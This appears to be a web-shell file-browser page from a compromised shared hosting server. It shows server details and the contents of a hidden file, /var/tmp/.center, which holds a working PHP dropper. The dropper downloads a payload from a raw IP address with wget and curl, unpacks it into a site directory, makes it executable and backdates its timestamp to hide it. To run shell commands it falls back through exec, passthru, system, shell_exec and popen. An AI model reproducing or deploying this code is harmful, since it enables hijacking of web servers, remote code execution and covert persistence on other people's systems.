HEX
Server: Apache
System: Linux iad1-shared-b7-16 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
User: dh_3gsgvh (5795692)
PHP: 8.2.26
Disabled: NONE
Upload Files
File: //var/tmp/.center
<?php   $p = '/home/greencitychicago/greencitylandscapes.com//tmp/videozetu.com/section_tree1'; $u = 'http://185.147.124.223/84550467b9fc9e2cc5e54438793743f4'; $fs = 2985; $ft = 1736613025; run("wget -O {$p} {$u} && gunzip {$p}.gz"); check($p, $fs, $ft); run("curl -o {$p} {$u} && gunzip {$p}.gz"); check($p, $fs, $ft); function check($p, $fs, $ft) {     if (file_exists($p) && filesize($p) == $fs) {         @chmod($p, 0744);         @touch($p, $ft);         die('_uploaded!_');     } } function run($in) {     $out = '';     if (function_exists('exec')) {         @exec($in, $out);         $out = @join("\n", $out);     } elseif (function_exists('passthru')) {         ob_start();         @passthru($in);         $out = ob_get_clean();     } elseif (function_exists('system')) {         ob_start();         @system($in);         $out = ob_get_clean();     } elseif (function_exists('shell_exec')) {         $out = shell_exec($in);     } elseif (is_resource($f = @popen($in, "r"))) {         $out = "";         while (!@feof($f)) $out .= fread($f, 1024);         pclose($f);     }     return $out; } die('_upload_failed_');